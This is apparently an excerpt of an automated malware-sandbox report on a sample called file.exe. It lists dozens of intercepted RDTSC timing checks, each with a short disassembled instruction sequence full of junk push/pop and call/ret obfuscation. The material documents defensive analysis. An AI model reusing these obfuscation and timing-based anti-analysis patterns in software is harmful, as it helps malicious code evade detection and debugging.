                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638F71 second address: 638FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jnc 00007F46B8DCA196h 0x0000000d popad 0x0000000e popad 0x0000000f add dword ptr [esp], 0266D455h 0x00000016 xor dword ptr [ebp+122D19F2h], ecx 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F46B8DCA198h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D2933h], ecx 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F46B8DCA198h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a push 00000003h 0x0000005c push A55F2871h 0x00000061 jo 00007F46B8DCA1A0h 0x00000067 pushad 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6390AC second address: 639167 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F46B8B98B08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 084F899Ah 0x00000013 jmp 00007F46B8B98B12h 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F46B8B98B08h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 sub dword ptr [ebp+122D1D38h], ebx 0x0000003a call 00007F46B8B98B0Eh 0x0000003f mov cx, dx 0x00000042 pop edx 0x00000043 push 00000000h 0x00000045 adc ecx, 1594D621h 0x0000004b push 00000003h 0x0000004d call 00007F46B8B98B18h 0x00000052 mov edx, 6F2D60DBh 0x00000057 pop edx 0x00000058 call 00007F46B8B98B09h 0x0000005d jnp 00007F46B8B98B13h 0x00000063 jmp 00007F46B8B98B0Dh 0x00000068 push eax 0x00000069 jmp 00007F46B8B98B0Fh 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639167 second address: 639179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639179 second address: 63917E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63917E second address: 639197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F46B8DCA196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jc 00007F46B8DCA1A0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639197 second address: 639201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push esi 0x0000000b je 00007F46B8B98B08h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pop eax 0x00000015 call 00007F46B8B98B0Ah 0x0000001a mov dl, EAh 0x0000001c pop edx 0x0000001d lea ebx, dword ptr [ebp+1244AE4Fh] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F46B8B98B08h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov edx, dword ptr [ebp+122D37A2h] 0x00000043 push eax 0x00000044 pushad 0x00000045 jmp 00007F46B8B98B11h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639201 second address: 639205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C346 second address: 64C34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659FB7 second address: 659FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659FBB second address: 659FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DB7 second address: 657DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DBB second address: 657DC4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DC4 second address: 657DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8DCA1A8h 0x00000009 jmp 00007F46B8DCA19Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657DF1 second address: 657DFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F46B8B98B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657F30 second address: 657F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F46B8DCA19Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6583FC second address: 658406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658406 second address: 65840A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6589FD second address: 658A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B5E second address: 658B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B6C second address: 658B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F46B8B98B0Eh 0x0000000e jo 00007F46B8B98B06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B8B second address: 658B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658B91 second address: 658BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F46B8B98B12h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F46B8B98B19h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658BC3 second address: 658BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658D2D second address: 658D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658FEE second address: 658FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658FF2 second address: 659002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F46B8B98B06h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651355 second address: 651359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651359 second address: 65135F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659767 second address: 65976C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598B4 second address: 6598BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598BA second address: 6598D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598D9 second address: 6598DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6598DF second address: 6598E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659E35 second address: 659E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E2E4 second address: 65E2E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E2E9 second address: 65E2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F25C second address: 65F261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662DE0 second address: 662DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629709 second address: 62970D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66615E second address: 666162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665771 second address: 665776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6658BA second address: 6658C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665D25 second address: 665D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6695DD second address: 6695E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669736 second address: 66973A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66973A second address: 66974A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66974A second address: 6697B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F46B8DCA196h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F46B8DCA1A5h 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F46B8DCA198h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 cld 0x00000031 call 00007F46B8DCA199h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F46B8DCA1A3h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6697B0 second address: 6697BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F46B8B98B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669B96 second address: 669B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669D0C second address: 669D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A636 second address: 66A63D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A7EA second address: 66A7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A98C second address: 66A990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AA2E second address: 66AA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AAD4 second address: 66AB15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F46B8DCA198h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 jmp 00007F46B8DCA1A2h 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B000 second address: 66B043 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F46B8B98B16h 0x0000000f push 00000000h 0x00000011 mov di, ax 0x00000014 push 00000000h 0x00000016 jmp 00007F46B8B98B16h 0x0000001b xchg eax, ebx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B043 second address: 66B067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B067 second address: 66B06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B9B9 second address: 66B9D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CB86 second address: 66CB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C232 second address: 66C236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CB8B second address: 66CB92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C236 second address: 66C23C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66CB92 second address: 66CBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D5990h] 0x00000010 push 00000000h 0x00000012 sbb esi, 0F11567Eh 0x00000018 mov edi, 14487293h 0x0000001d push 00000000h 0x0000001f sub esi, 17DD72D2h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 pushad 0x0000002a popad 0x0000002b pop ebx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C23C second address: 66C242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E0A3 second address: 66E126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F46B8B98B08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007F46B8B98B0Ch 0x00000029 jp 00007F46B8B98B06h 0x0000002f push 00000000h 0x00000031 movzx esi, bx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F46B8B98B08h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 jmp 00007F46B8B98B15h 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E126 second address: 66E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EB15 second address: 66EB1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EB1A second address: 66EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F46B8DCA19Bh 0x0000000d nop 0x0000000e pushad 0x0000000f mov ebx, edx 0x00000011 popad 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F46B8DCA198h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+1244AF88h] 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D334Fh], ebx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66EB64 second address: 66EB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6701A6 second address: 6701AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671667 second address: 671672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F46B8B98B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671CF5 second address: 671DA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA19Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F46B8DCA19Ch 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F46B8DCA198h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov ebx, dword ptr [ebp+122D37A2h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F46B8DCA198h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 add bx, BFD6h 0x00000055 push 00000000h 0x00000057 jnl 00007F46B8DCA19Ch 0x0000005d adc edi, 002CB847h 0x00000063 xchg eax, esi 0x00000064 jg 00007F46B8DCA1ADh 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F46B8DCA19Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671DA2 second address: 671DAC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F46B8B98B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672E0B second address: 672E33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F46B8DCA1B9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F46B8DCA1A7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671F44 second address: 671F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6730BD second address: 6730C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674106 second address: 67410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67410A second address: 67410E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675006 second address: 6750A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and ebx, 26950E2Eh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007F46B8B98B0Eh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 pushad 0x00000024 push ebx 0x00000025 jmp 00007F46B8B98B17h 0x0000002a pop edx 0x0000002b mov eax, dword ptr [ebp+122D34AEh] 0x00000031 popad 0x00000032 mov eax, dword ptr [ebp+122D1215h] 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F46B8B98B08h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 and bh, 0000003Bh 0x00000055 push FFFFFFFFh 0x00000057 or ebx, 296AB1A4h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F46B8B98B0Ch 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675CAA second address: 675CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
